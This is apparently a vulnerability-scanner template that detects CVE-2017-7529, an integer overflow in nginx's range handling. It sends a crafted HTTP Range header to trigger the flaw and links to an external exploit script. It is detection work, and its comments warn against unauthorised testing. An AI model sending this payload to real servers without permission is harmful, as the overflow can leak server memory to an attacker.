id: CVE-2017-7529
info:
  author: "Harsh Bothra"
  name: "Nginx Remote Integer Overflow"
  severity: medium

# This template supports the detection part only.
# Do not test any website without permission
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py

requests:
  - raw:
      - |
          GET / HTTP/1.1
          Host: {{Hostname}}
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Range: bytes=-17208,-9223372036854758792
          Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 206
      - type: word
        words:
          - Content-Range
        part: all